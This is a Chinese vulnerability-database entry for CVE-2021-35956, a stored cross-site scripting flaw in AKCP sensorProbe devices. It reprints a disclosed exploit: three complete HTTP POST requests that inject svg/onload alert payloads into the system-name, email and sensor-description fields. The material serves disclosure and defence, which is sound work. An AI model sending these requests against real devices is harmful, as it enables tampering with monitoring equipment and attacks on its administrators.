文章目录[隐藏]
AKCP sensorProbe 跨站脚本漏洞
| 漏洞ID | 2493130 | 漏洞类型 | 跨站脚本 |
| 发布时间 | 2021-07-02 | 更新时间 | 2021-07-07 |
 CVE编号 |
CVE-2021-35956 |  CNNVD-ID |
CNNVD-202106-1985 |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
AKCP sensorProbe是美国AKCP公司的一个平台独立的环境和安全监控设备。只需分配 IP 地址并连接到嵌入式网络服务器。 AKCP sensorProbe 嵌入式网络服务器SP480-20210624之前版本存在跨站脚本漏洞,该漏洞允许远程攻击者通过传感器描述、电子邮件(发件人/收件人/抄送)、系统名称和系统位置字段引入任意 JavaScript。
|漏洞EXP
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 07-01-2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www.akcp.com/
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
# Version: < SP480-20210624
# CVE: CVE-2021-35956
# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
1) Stored Cross-Site Scripting via System Settings
POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
2) Stored Cross-Site Scripting via Email Settings
POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
[email protected]&[email protected]&[email protected]&[email protected]&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
3) Stored Cross-Site Scripting via Sensor Description
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
|参考资料
来源:nvd.nist.gov
链接:https://nvd.nist.gov/vuln/detail/CVE-2021-35956
本文由 华域联盟 原创撰写:华域联盟 » AKCP sensorProbe 跨站脚本漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/104396.htm
